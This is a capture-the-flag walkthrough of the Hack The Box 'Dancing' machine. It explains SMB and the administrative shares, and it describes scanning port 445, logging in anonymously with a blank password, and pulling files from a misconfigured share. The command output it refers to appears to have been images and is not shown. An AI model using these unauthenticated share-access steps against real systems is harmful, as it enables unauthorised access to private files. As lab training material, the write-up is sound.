HTB-Dancing-Write-up
Introduction
There are multiple ways to transfer a file between two hosts (computers) on the same network. One of
these protocols is studied in this example, and that is SMB (Server Message Block). This communication
protocol provides shared access to files, printers, and serial ports between endpoints on a network. We
mostly see SMB services running on Windows machines.
During scanning, we will typically see port 445 TCP open on the target, reserved for the SMB protocol.
Usually, SMB runs at the Application or Presentation layers of the OSI model, pictured below. Due to this, it
relies on lower-level protocols for transport. The Transport layer protocol that Microsoft SMB Protocol is
most often used with is NetBIOS over TCP/IP (NBT). This is why, during scans, we will most likely see both
protocols with open ports running on the target. We will see this during the enumeration phase of the write-
up.
Let’s Start To Pwned Our Target
Intial Enumeration
We Use ping Command To Test Our Target Is Ready
Good, We Use Nmap Tool
Look We Have a SMB Service is Open on 445 Port Number
Nevertheless, let us use our local username since we do not know about any remote usernames present on
the target host that we could potentially log in with. Next up, after that, we will be prompted for a password.
This password is related to the username you input before. Hypothetically, if we were a legitimate remote
user trying to log in to their resource, we would know our username and password and log in normally to
access our share. In this case, we do not have such credentials, so what we will be trying to perform is any of
the following:
Guest authentication
Anonymous authentication
Any of these will result in us logging in without knowing a proper username/password combination and
seeing the files stored on the share. Let us proceed to try that. We leave the password field blank, simply
hitting Enter to tell the script to move along.
As always, we can type the name of our script in the terminal followed by the switch -h or — help to find
out more about the capabilities of this script alongside its usage.
Running the command above, we see that four separate shares are displayed. Let us go through each of
them and see what they mean.
ADMIN$ — Administrative shares are hidden network shares created by the Windows NT family of
operating systems that allow system administrators to have remote access to every disk volume on a
network-connected system. These shares may not be permanently deleted but may be disabled.
C$ — Administrative share for the C:\ disk volume. This is where the operating system is hosted.
IPC$ — The inter-process communication share. Used for inter-process communication via named
pipes and is not part of the file system.
WorkShares — Custom share.
We will try to connect to each of the shares except for the IPC$ one, which is not valuable for us since it is
not browsable as any regular directory would be and does not contain any files that we could use at this
stage of our learning experience. We will use the same tactic as before, attempting to log in without the
proper credentials to find improperly configured permissions on any of these shares. We’ll just give a blank
password for each username to see if it works. First, let us try the ADMIN$ one.
The NT_STATUS_ACCESS_DENIED is output, letting us know that we do not have the proper credentials to
connect to this share. We will follow up with the C$ administrative share.
Same idea here. Last chance. We proceed with attempting to log in to the custom WorkShares SMB share.
This seems to be human-made, thus prone to misconfiguration.
Typing in the ls command will show us two directories, one for Amy.J and one for James.P . We visit the
first one and are met with a file called worknotes.txt , which we can download using the get command.
Let’s Open The Flag File
Finaly This Answer For Tasks
Follow Up: Linkedin
